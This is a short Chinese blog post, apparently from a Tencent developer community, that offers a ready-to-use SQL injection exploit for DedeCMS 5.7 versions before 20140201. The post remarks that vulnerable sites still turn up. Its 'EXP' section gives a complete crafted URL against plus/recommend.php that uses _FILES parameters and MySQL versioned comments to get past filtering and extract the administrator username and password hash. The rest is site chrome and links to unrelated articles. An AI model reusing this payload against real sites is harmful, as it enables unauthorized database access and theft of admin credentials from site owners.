DedeCMS 20140201 之前的5.7通杀SQL注入漏洞

V站笔记

虽然漏洞有点久远了,但有的时候还能遇见…

0x00 EXP

http://www.dyboy.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'or mid=@`\'`/*!50000union*//*!50000select*/1,2,3,(selectCONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111

0x01 成功案例

利用成功的截图如下

原创声明,本文系作者授权云+社区发表,未经许可,不得转载。

如有侵权,请联系 yunjia_community@tencent.com 删除。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏coding

django2实战2.创建博客应用创建应用文章表的字段设计激活应用开启后台将post模型注册到后台自定义文章显示字段增加可选操作

上篇创建了一个项目,项目相当于站点,应用即是独立的功能模块。比如:淘宝是一个完整的网站,即是一个项目。而淘宝下的聚划算属于一个应用

1413
来自专栏IMWeb前端团队

WebWorker简介

本文作者:IMWeb rakuluo 原文出处:IMWeb社区 未经同意,禁止转载 为 JavaScript引入线程技术 不必再用 setTime...

2048
来自专栏Samego开发资源

Linux环境下使用C/C++编写CGI之安装cgicc模块

1443
来自专栏cmazxiaoma的架构师之路

FastDFS蛋疼的集群和负载均衡(七)之Nginx高可用集群应用到FastDFS集群

1502
来自专栏前端学习心得

浏览器存储

1275
来自专栏haifeiWu与他朋友们的专栏

Android动态权限申请(Kotlin版)

Android6.0之后,APP有些用到的权限需要动态申请,虽然这个功能已经出来好久了,但一直没有研究过,只知道用法简单,到时候copy一下就好了,github...

4052
来自专栏芋道源码1024

分布式作业 Elastic-Job-Lite 源码分析 —— 注册中心监听器

在《Elastic-Job-Lite 源码分析 —— 作业初始化》「3.2.4」注册作业启动信息,我们看到作业初始化时,会开启所有注册中心监听器:

1654
来自专栏Golang语言社区

游戏服务器之多线程发送(下)

5、发送缓冲区数据 检查可发送该线程的相关联的所有会话上的发送缓冲区的数据,检查完后,发送会话上的发送缓冲区的数据。 VOID ExecSockDataMgr:...

3395
来自专栏Coding01

推荐一款 phpcs 插件规范 Laravel 代码 (规范从本地写代码到版本控制)

我相信每个公司都有一套完备的代码规范标准,但标准是标准,如何能有效的让所有人遵守,那就要工具的辅助和实时提醒了。

1374
来自专栏乐沙弥的世界

cannot set user id: Resource temporarily unavailable

    前阵子,Infra报告无法透过putty以及SecureCRT连接到数据库服务器,提示的错误为Resource temporarily unavaila...

630

扫码关注云+社区